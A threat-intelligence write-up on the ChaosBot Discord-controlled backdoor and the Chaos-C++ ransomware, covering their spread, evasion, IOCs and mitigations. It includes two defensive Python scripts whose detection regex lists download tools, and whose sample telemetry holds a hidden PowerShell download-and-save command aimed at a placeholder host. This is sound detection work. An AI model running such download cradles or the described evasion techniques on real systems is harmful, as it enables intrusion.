ChaosBot: a new Rust backdoor that uses Discord to control infected PCs

Disclosed: October 13, 2025
Category: Malware / Threat Intelligence

A fresh, worrying entrant in the threat landscape — ChaosBot — was first observed in late September 2025 in a financial-services environment and publicly disclosed on October 13, 2025. Written in Rust, this backdoor stands out because it uses Discord channels as its command-and-control (C2) and combines reconnaissance, remote command execution, modern persistence, and evasion techniques. A related family, Chaos‑C++, has evolved into destructive ransomware that also hijacks clipboards to steal cryptocurrency.

TL;DR — Quick summary

  • Malware: ChaosBot (Rust backdoor); Chaos‑C++ (C++ ransomware with destructive & clipboard-hijack features).
  • C2 channel: Discord channels (operator accounts observed: chaos_00019, lovebb0024 — may change).
  • Distribution: Compromised credentials (Cisco VPN, over-privileged AD service account) and phishing LNK shortcuts that launch PowerShell to fetch payloads.
  • Persistence: DLL sideloading (msedge_elf.dll) via a trojanized Edge binary (identity_helper.exe); also deploys an FRP reverse proxy and attempts to set up a VS Code Tunnel backdoor.
  • Evasion: ETW patching (ntdll!EtwEventWrite) and VM detection via MAC prefix checks.
  • Ransomware: Chaos‑C++ deletes files >1.3 GB, encrypts smaller files, and hijacks clipboard crypto addresses.

Technical breakdown — what ChaosBot does

ChaosBot is primarily a remote-control backdoor. Once executed it:

  • Performs system reconnaissance (enumeration, environment checks).
  • Connects to a Discord channel created by the operator (often named after the victim hostname) and polls for commands — replacing bespoke C2 infra with a resilient public platform.
  • Supports interactive commands: shell (execute commands), scr (screenshots), download/upload, and file exfiltration via Discord posts.
  • Deploys tooling such as an FRP reverse proxy to open persistent tunnels into the breached environment.
  • Attempts to install alternate backdoors (observed attempts to use VS Code Tunnel).
  • Achieves persistence through DLL sideloading: identity_helper.exe (trojanized Edge binary) loads msedge_elf.dll.

How it spreads

Two main vectors were observed in the disclosure:

  • Compromised credentials + lateral execution: Stolen Cisco VPN credentials and over-privileged Active Directory service accounts were used to run remote WMI commands and push ChaosBot across hosts.
  • Phishing with malicious LNK files: Targets receive an LNK file; opening it runs a PowerShell one-liner that downloads the payload and shows a decoy PDF (e.g., spoofed bank doc) to distract the victim.

Evasion techniques

  • ETW patching: ChaosBot patches the start of ntdll!EtwEventWrite to hinder Event Tracing for Windows (ETW) detections.
  • VM detection: The malware checks MAC prefixes for VMware/VirtualBox vendors and exits if it detects a sandbox/VM to avoid analysis.

Chaos‑C++ ransomware: destructive + clipboard theft

A related family — Chaos‑C++ — exhibits destructive and financial-theft features:

  • Deletes files larger than ~1.3 GB (irrecoverable) while encrypting smaller files.
  • Hijacks the clipboard: when it detects cryptocurrency addresses, it replaces them with attacker-controlled addresses to intercept transfers.
  • Installer masquerades as bogus utilities (e.g., “System Optimizer v2.1”).
  • Looks for %APPDATA%\READ_IT.txt — presence may change behavior (monitoring mode); when absent and running as admin, it disables recovery features.
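The clipboard-hijack behaviour above is simple to describe and simple to watch for from the defender's side. The following is an added example (not Chaos‑C++ code and not from the original post): it takes a series of clipboard snapshots and raises an alert when a wallet-looking address is replaced by a different address of the same kind within a very short window, which is the signature of an automated swap rather than a user copying a second address. The address regexes, the two-second window and the sample snapshots are assumptions constructed for the example; in a real agent the snapshots would come from polling the OS clipboard.

```python
"""Detect clipboard address swaps from a sequence of (timestamp, text) snapshots.

Added example for illustration; patterns and thresholds are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Approximate wallet-address shapes (assumption): enough to say "this looks
# like a BTC / ETH address", not a full checksum validation.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify(text: str) -> Optional[str]:
    """Return the address kind ("btc", "eth") or None for ordinary clipboard text."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


@dataclass
class SwapAlert:
    at: float            # timestamp of the snapshot that showed the swapped value
    kind: str            # address family that was swapped
    original: str        # what the user copied
    replaced_with: str   # what the clipboard held afterwards


def detect_swaps(snapshots: Sequence[Tuple[float, str]], window_s: float = 2.0) -> List[SwapAlert]:
    """Flag an address replaced by a *different* address of the same kind within
    window_s seconds. A hijacker rewrites the clipboard almost immediately after
    the user's copy; a person copying a second address takes longer (assumption
    used as the timing heuristic)."""
    alerts: List[SwapAlert] = []
    prev_t: Optional[float] = None
    prev_text: Optional[str] = None
    for t, text in snapshots:
        kind = classify(text)
        if prev_text is not None and prev_t is not None and kind is not None:
            same_family = classify(prev_text) == kind
            changed = text.strip() != prev_text.strip()
            if same_family and changed and (t - prev_t) <= window_s:
                alerts.append(SwapAlert(t, kind, prev_text.strip(), text.strip()))
        prev_t, prev_text = t, text
    return alerts


# Constructed sample data: base58-safe dummy BTC strings and synthetic ETH hex.
BTC_A = "1ExampAddrConstructedForDemoAB"
BTC_B = "1ExampAddrConstructedForDemoCD"
ETH_A = "0x" + "a1" * 20
ETH_B = "0x" + "b2" * 20

SAMPLE_SNAPSHOTS = [
    (0.0, "quarterly report draft"),
    (5.0, BTC_A),
    (5.3, BTC_B),    # same-family address 300 ms later: looks like a swap
    (20.0, ETH_A),
    (45.0, ETH_B),   # 25 s apart: plausibly the user copied a second address
    (60.0, ETH_B),   # unchanged value, nothing to report
    (61.0, "hello"),
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_SNAPSHOTS):
        print(f"{alert.at:>6.1f}s {alert.kind}: {alert.original} -> {alert.replaced_with}")
```

The timing heuristic is deliberately conservative: a single short window catches the automated rewrite without flagging a user who pastes one address and then copies another a minute later. An endpoint control built on this would also want to know whether a foreground copy action preceded the change, which clipboard snapshots alone cannot tell you.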

Indicators of Compromise (IOCs) & telltale signs

Hunt for these artifacts and behaviors:

  • Files/processes: identity_helper.exe, msedge_elf.dll, %APPDATA%\READ_IT.txt.
  • Distribution artifacts: malicious .lnk files, decoy PDFs, PowerShell one-liners that fetch executables.
  • Network: Unusual Discord API calls or channel activity tied to hostnames; FRP or unexpected reverse-proxy tunnels; anomalous VS Code Tunnel connections.
  • Accounts/behavior: Suspicious AD service account activity, WMI remote executions, Cisco VPN logins from unfamiliar IPs.
  • Discord identifiers: Operator accounts observed (examples): chaos_00019, lovebb0024 — these may rotate.

Immediate mitigation & detection recommendations

  • Harden credentials & access: Revoke/rotate compromised credentials, enforce MFA for VPN and privileged accounts, and remove over-privileged service accounts.
  • Block LNK-based phishing: Configure email gateways to block suspicious .lnk attachments; detect and quarantine PowerShell download events.
  • Monitor DLL sideloading: Alert on non-standard DLLs loaded by browser or legitimate binaries (e.g., Edge variants loading msedge_elf.dll).
  • Network monitoring: Detect Discord API access from endpoints that shouldn’t use Discord; flag unknown outbound FRP tunnels or reverse proxies.
  • Detect ETW tampering & VM checks: Monitor for modifications to ntdll!EtwEventWrite and unusual process exits in virtualized environments.
  • Protect crypto flows: Educate users and implement clipboard protections or endpoint controls to detect suspicious clipboard swaps.
  • Backup & recovery: Maintain immutable offline backups and IR playbooks for extortion/destruction scenarios.
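To make the IOC list and the detection recommendations above concrete, here is an added example (not from the original post and not vendor detection content) of a small hunting script run over constructed Sysmon-style endpoint events. It implements four of the checks described: identity_helper.exe loading msedge_elf.dll from outside a trusted Edge directory, Discord API traffic from a process that is not the sanctioned client, a PowerShell download cradle, and a shell spawned by WmiPrvSE.exe (the parent you see when a process is created via remote WMI). The event field names, the trusted Edge paths, the Discord hostnames, the sanctioned-client name and every sample event are assumptions constructed for the example; only the artifact names come from the disclosure.

```python
"""Hunt ChaosBot-style artifacts in Sysmon-like endpoint telemetry (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional

# Artifact names are from the disclosure; everything else here is an assumption.
SIDELOAD_HOST = "identity_helper.exe"
SIDELOAD_DLL = "msedge_elf.dll"
TRUSTED_EDGE_DIRS = (
    r"c:\program files (x86)\microsoft\edge\application",
    r"c:\program files\microsoft\edge\application",
)
DISCORD_HOSTS = {"discord.com", "discordapp.com", "gateway.discord.gg"}
SANCTIONED_DISCORD_IMAGES = {"discord.exe"}   # the approved client, if any
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _under_trusted_dir(path: str) -> bool:
    return any(path.lower().startswith(d) for d in TRUSTED_EDGE_DIRS)


def check_image_load(ev: dict) -> Optional[Finding]:
    """Sideload tell: the Edge helper loads msedge_elf.dll from a non-Edge directory."""
    loaded = ev.get("ImageLoaded", "")
    if (_basename(ev.get("Image", "")) == SIDELOAD_HOST
            and _basename(loaded) == SIDELOAD_DLL
            and not _under_trusted_dir(loaded)):
        return Finding("dll_sideload", ev["Host"], f"{ev['Image']} loaded {loaded}")
    return None


def check_network(ev: dict) -> Optional[Finding]:
    """Discord API reached by anything other than the sanctioned client."""
    dest = ev.get("DestinationHostname", "").lower()
    if dest in DISCORD_HOSTS and _basename(ev.get("Image", "")) not in SANCTIONED_DISCORD_IMAGES:
        return Finding("discord_from_unexpected_process", ev["Host"], f"{ev['Image']} -> {dest}")
    return None


def check_process(ev: dict) -> Optional[Finding]:
    """PowerShell download cradles and shells spawned through remote WMI."""
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CRADLE.search(cmd):
        return Finding("powershell_download_cradle", ev["Host"], f"parent={parent}: {cmd}")
    if parent == "wmiprvse.exe" and image in SHELLS:
        return Finding("wmi_remote_exec", ev["Host"], f"WmiPrvSE spawned {image}: {cmd}")
    return None


CHECKS: Dict[str, Callable[[dict], Optional[Finding]]] = {
    "ImageLoad": check_image_load,
    "NetworkConnect": check_network,
    "ProcessCreate": check_process,
}


def hunt(events: Iterable[dict]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        check = CHECKS.get(ev.get("EventType", ""))
        finding = check(ev) if check else None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: three malicious-looking events on WS-FIN-07, one
# remote-WMI launch on SRV-APP-01, and benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"EventType": "ImageLoad", "Host": "WS-FIN-07",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\identity_helper.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\msedge_elf.dll"},
    {"EventType": "ImageLoad", "Host": "WS-FIN-07",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_elf.dll"},
    {"EventType": "NetworkConnect", "Host": "WS-FIN-07",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\identity_helper.exe",
     "DestinationHostname": "discord.com"},
    {"EventType": "NetworkConnect", "Host": "WS-MKT-02",
     "Image": r"C:\Users\asmith\AppData\Local\Discord\app-1.0.9\Discord.exe",
     "DestinationHostname": "discord.com"},
    {"EventType": "ProcessCreate", "Host": "WS-FIN-07",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"Invoke-WebRequest http://EXAMPLE-PLACEHOLDER/x -OutFile $env:TEMP\\x.exe\""},
    {"EventType": "ProcessCreate", "Host": "SRV-APP-01",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c \\\\fileshare\\tools\\identity_helper.exe"},
    {"EventType": "ProcessCreate", "Host": "WS-MKT-02",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -c Get-Date"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The path check in check_image_load is what keeps the sideload rule usable: a genuine Edge install also pairs identity_helper.exe with msedge_elf.dll, so the signal is the DLL's location, not the file names alone. Likewise the Discord rule assumes you know which binary, if any, is allowed to talk to Discord; where Discord is not used at all, drop the allow-list and alert on every hit.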

Conclusion

ChaosBot shows how modern adversaries compose multiple tools and public platforms (Discord, FRP, VS Code Tunnel) to build resilient, stealthy C2 channels. Paired with the evolution of Chaos‑C++ into destructive and financially-motivated ransomware, the threat demonstrates credential abuse, DLL sideloading persistence, reverse-proxying, and sophisticated anti-analysis techniques.

If you manage endpoints or networks: assume attackers are innovating and proactively hunt for the artifacts above.